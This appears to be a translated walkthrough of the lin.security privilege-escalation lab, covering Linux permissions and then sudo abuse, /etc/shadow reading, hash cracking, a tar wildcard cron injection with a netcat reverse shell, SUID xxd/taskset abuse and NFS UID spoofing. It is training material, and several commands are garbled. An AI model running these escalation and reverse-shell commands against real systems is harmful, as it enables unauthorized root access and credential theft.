in.security 提权靶场

lin.security Range is a range that led to the escalation of privileges caused by Linux configuration problems. It is based on Ubuntu (18.04 LTS) Linux virtual machine. Range provides many privilege escalation vulnerabilities for us to practice related knowledge about linux permissions. The following is the download link for this range:

https://in.security/downloads/lin.security_v1.0.ova

Low permissions for shooting range: bob:secret

查看当前用户的权限: whoami, id

查看系统的发行版本和内核版本: lsb_release -a, uname -a

1 linux 下的权限划分

1.1 用户和组

User groups play an important role on Linux systems, and they provide selected users with an easy way to share files with each other. They also enable system administrators to manage user permissions more efficiently because they can assign permissions to groups rather than individual users.

Linux users are divided into administrators and ordinary users, and ordinary users are divided into system users and custom users.

System administrator: that is, the root account, the UID number is 0, and has all system permissions. It is similar to the administrator account in Windows system and is the owner of the entire system.

System user: Linux is an account built into its own system management. It is usually automatically created during the installation process and cannot be used to log in to the operating system. The UID is between 1-499 (Centos 7 is between 1-999). Users like sshd, pulse, etc. above are such users. It is similar to the system account in Windows, and of course the permissions are far less high than the system account.

Custom user: The root administrator creates an account for users to log in to the system for operations. The UID is above 500 (CentOS7 is above 1000). It is similar to an account in the users user group on Windows systems.

Each user in Linux must belong to a group, and cannot be independent of the group. In Linux, each file has the concept of owner, group, or other groups. Similarly, we can view the information of user groups in /etc/group

1.2 /etc/passwd 文件

In the /etc/passwd file of Linux, each user has a corresponding record line, which records some basic properties of this user. System administrators are often exposed to modification of this file to complete the management of users.

Add an account to the linux system: useradd -g group -d /home/to/user -m username

Field meaning:

1.3 /etc/shadow 文件

Field meaning:

Username : Encrypted password (! means no password) : Last modified time : Minimum modification time interval : Password validity period : Password needs warning days before change : Grace time after password expires : Account expiration time : Reservation field

加密的密码具有固定格式：$id$salt$encrypted

id represents the encryption algorithm, 1 represents MD5, 5 represents SHA-256, 6 represents SHA-512

salt is the salt value, and the system generates randomly

encrypted represents the hash value of the password

1.4 文件权限

In the Linux system, everything is a file, including ordinary files, directories, devices, sockets, etc.

rwx permissions to directory

r: means that you have permission to read the directory structure list, and means that you can query the file name data in the directory. That is ls

w: means that you can add, delete, rename, copy, cut files or directories under this folder, etc.

x: indicates whether the user can enter the directory and become a working directory (when there is no x permission, but w permission, it is also impossible to write files to the file)

1.5 特殊权限

SUID

When executing the file, it will switch to the owner's permission to execute

SGID

When this file is executed, it will switch to the permissions of all groups to execute

SBIT

Only you and the administrator can operate the current file

2 sudo 权限配置不当提权

sudo is actually a very common command. The sudo permission is root. The command that can only be executed by super users to execute to ordinary users. The command here refers to system commands. For Linux, everything is a file, so the system command is also a file.

Generally speaking, when an administrator needs a user to execute the root permission command, he will configure sudo. Specifically, modify the /etc/sudoers file. However, ordinary users actually view and operate this file, and they can only check whether they have configured sudo permissions. Ordinary users can use the sudo -l command to check whether they have sudo configuration.

bob user can execute many commands, and using these commands can simply and directly upgrade to root permissions.

2.1 /bin/ash

2.2 /usr/bin/awk

View password file /etc/shadow

2.3 /usr/bin/curl

2.4 /usr/bin/find

Get shell

find . -exec /bin/sh \; -quit

It can be found that even if the find search command is given sudo, it can be raised as root permissions, as long as we can cleverly use these commands to execute. Due to space limitations, we will not give any way to use all commands. We can refer to the resources

https://gtfobins.github.io/, which covers many commands that can be exploited.

3 /etc/passwd的哈希

The user password hash of linux is stored in the /etc/shadow file, which ordinary users cannot view. What ordinary users can view is the /etc/passwd file. If we look at /etc/passwd, we usually see the following:

1

root:x:0:0:root:/root:/bin/bash

If there is an account's second column is a password hash, if the column is x, it means the password hash is stored on the /etc/shadow file. On the lin.security virtual machine, you can see an account like insecurity, and the uid and gid of this account are 0. Using Johnny or hash-identifier will be represented as descrypt, which can then be cracked.

Through query, you can get the password P@ssw0rd11.

4 利用定时任务cron以及通配符

Execute the /etc/cron.daily/backup file regularly every 1 minute.

This involves using wildcards to perform local Linux privilege raising. We need to open another bob ssh session.

Use msfvenom to generate nc rebound sentence, the command is as follows:

-p:payload

R: RAW raw data

1

2

3

4

5

6

root@kali:~# msfvenom -p cmd/unix/reverse_netcat lhost=127.0.0.1 lport=8888 R

[-] No platform was selected, choosing Msf:Module:Platform:Unix from the payload

[-] No arch selected, selecting arch: cmd from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 91 bytes

mkfifo /tmp/kuhdq; nc 127.0.0.1 8888 0/tmp/kuhdq | /bin/sh /tmp/kuhdq 21; rm /tmp/kuhdq

Then execute separately:

1

2

3

bob@linsecurity:~$ echo 'mkfifo /tmp/kuhdq; nc 127.0.0.1 8888 0/tmp/kuhdq | /bin/sh /tmp/kuhdq 21; rm /tmp/kuhdq' shell.sh chmod +x shell.sh

bob@linsecurity:~$ echo '' '--checkpoint-action=exec=sh shell.sh'

bob@linsecurity:~$ echo '' --checkpoint=1

We enable nc listening in another session terminal:

1

nc -lvnp 8888

–checkpoint[=NUMBER] Displays progress message for each Numbers record (default is 10)

--checkpoint-action=ACTION Perform ACTION on each checkpoint (checkpoint)

The --checkpoint-action option here specifies the program to be executed when a checkpoint reaches, which will allow us to run an arbitrary command. Therefore, the options --checkpoint=1 and --checkpoint-action=exec=sh shell.sh are handed over to the tar program as command line options.

5 利用隐藏文件

Sometimes hidden files will store some important information, such as searching for all hidden files in the home directory and displaying them with ls -al.

1

find/-name '.*' -type f -path '/home/*' -exec ls -al {} \; 2/dev/null

I found that the user susan has a hidden file of .secret, and found that the user susan's login password is stored.

6 利用 SUID

6.1 方案一

SUID This is a combination of uid +s, s refers to special permissions. Generally speaking, the user's permissions are 3 digits, such as 0755. The default special permissions are not configured, but if the super administrator wants the user to have root permissions when executing some special permission files, they will configure special permissions.

For example, the passwd command will modify the /etc/shadow file, while the /etc/shadow can only be modified by root. Originally, the passwd command should only be executed by root. However, in order to allow ordinary users to modify their passwords, the system gives special permissions to the passwd command and adds restrictions that can only modify their passwords.

Since the passwd command has been restricted, there is no problem in granting special permissions, but if the special permissions of the system superuser are used indiscriminately, it will lead to the problem of raising the rights.

So how do we find out whether there are special permission configuration files in the system? You can quickly find all SUID files using the following command:

1

find/-perm -4000 -type f -exec ls -la {} 2/dev/null \;

We found the following file xxd. This file is actually a command file. The function of xxd is to display a file in hexadecimal form. He is configured with special permissions and the user group is itsservices with execution permissions x.

This is very dangerous, and once suid and execution permissions are together, it may lead to permission elevation.

We checked through the command and found that the user susan belongs to the user group itsservices.

We use it to view the /etc/shadow file. For more usage methods, please refer to https://gtfobins.github.io/gtfobins/xxd/.

1

xxd '/etc/shadow' | xxd -r

Note: find /dir -exec 'command' has the same effect of elevating power.

6.2 方案二

In addition to the above files, a file with the other role with execution permission was also found. This file is not limited to users, so it is even more harmful.

Refer to https://gtfobins.github.io/gtfobins/taskset/#suid-enabled, and you can find that this file can directly obtain the shell.

7 NFS 提权

nmap Scan the port to view open services: nmap -sS -Pn -p- -A IP

See open port 2049, NFS service. You can also use the rpinfo -p IP command to determine whether the NFS service is running or mounted on the host.

Information collection can be performed when the showmount command is used with the following parameters, for example:

Mounting point

Connected host

Table of contents

1

2

3

showmount IP //Connected host

showmount -d IP //Directory

showmount -a IP //Mount Point

There is also a module in msf that can be used to list export folders: auxiliary/scanner/nfs/nfsmount.

The home directory of the account peter can be mounted:

1

2

mkdir /mnt/peter

mount 192.168.68.99:/home/peter /mnt/peter/

The mounted peter home directory, the owner and group of the displayed file are 1001 and 1005 respectively

Try to create a file in this directory and find that the permissions are insufficient.

Even though we are root users on the kali attack machine, we still do not have write permissions because by default the root identity of the client will be actively compressed into anonymous.

You can fake the UID and GID of the file owner to trick the NFS server, create a user group with gid 1005, and then create a peter account with uid specified as 1001 and gid specified as 1005.

Switch the client user to peter, and the server also considers it to be an existing user.

You can write the public key directly to the .ssh folder and then log in directly using ssh.

8 利用 docker 组提权

It can be found that peter belongs to the docker group: